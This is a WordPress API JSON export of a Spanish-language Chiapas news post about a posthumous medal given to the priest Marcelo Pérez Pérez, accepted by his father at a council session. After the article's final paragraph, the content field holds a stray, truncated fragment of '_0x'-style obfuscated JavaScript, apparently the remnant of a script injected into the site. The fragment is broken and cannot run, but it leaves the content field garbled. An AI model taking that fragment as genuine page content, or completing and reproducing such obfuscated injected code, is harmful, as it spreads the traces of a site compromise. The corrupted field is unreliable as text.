{"id":19270,"date":"2024-12-12T04:42:01","date_gmt":"2024-12-12T04:42:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19270"},"modified":"2024-12-12T04:45:10","modified_gmt":"2024-12-12T04:45:10","slug":"entregan-post-mortem-la-medalla-fray-bartolome-de-las-casas-al-padre-marcelo-perez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19270","title":{"rendered":"Entregan Post Mortem la Medalla Fray Bartolom\u00e9 de Las Casas al padre Marcelo P\u00e9rez"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"19271\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978420345-1024x683.jpg\" alt=\"\" class=\"wp-image-19271\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978420345-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978420345-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978420345-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978420345.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"844\" data-id=\"19272\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978423372-1024x844.jpg\" alt=\"\" class=\"wp-image-19272\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978423372-1024x844.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978423372-300x247.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978423372-768x633.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733978423372.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>11 de diciembre del 2024. San Crist\u00f3bal de Las Casas. &#8211; En sesi\u00f3n solemne de cabildo, tuvimos el honor de entregar la Medalla &#8220;Fray Bartolom\u00e9 de Las Casas&#8221; post mortem al presb\u00edtero Marcelo P\u00e9rez P\u00e9rez, quien, lamentablemente, ya no est\u00e1 entre nosotros. Esta distinci\u00f3n fue recibida por su padre, Miguel P\u00e9rez S\u00e1ntiz en reconocimiento a su invaluable legado de lucha por los derechos humanos y la justicia social.<br>Acompa\u00f1ada por el Subsecretario de Gobierno, Jorge Cruz Pineda, el presidente de la Comisi\u00f3n Estatal de los Derechos Humanos (CEDH) de Chiapas, Juan Jos\u00e9 Zepeda Berm\u00fadez, y el Obispo de la Di\u00f3cesis de San Crist\u00f3bal, Rodrigo Aguilar Mart\u00ednez, destacamos el profundo ejemplo y mensaje que dej\u00f3 el presb\u00edtero Marcelo P\u00e9rez, una semilla de esperanza y valent\u00eda que sigue inspirando a todos.<br>Reiteramos nuestro firme compromiso para hacer de Chiapas un estado de paz y prosperidad, enfrentando los retos con determinaci\u00f3n y un rumbo claro hacia la reconciliaci\u00f3n y el bienestar com\u00fan.<br>Caminar juntos hacia la paz y la justicia es nuestro compromiso.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 11 de diciembre del 2024. San Crist\u00f3bal de Las Casas. &#8211; En sesi\u00f3n solemne de cabildo, tuvimos el honor de entregar la Medalla &#8220;Fray Bartolom\u00e9 de Las Casas&#8221; post mortem al presb\u00edtero Marcelo P\u00e9rez P\u00e9rez, quien, lamentablemente, ya no est\u00e1 entre nosotros. Esta distinci\u00f3n fue recibida por su padre, Miguel P\u00e9rez S\u00e1ntiz en reconocimiento &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19272,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19270","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19270","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19270"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19270\/revisions"}],"predecessor-version":[{"id":19273,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19270\/revisions\/19273"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19272"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19270"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19270"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19270"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}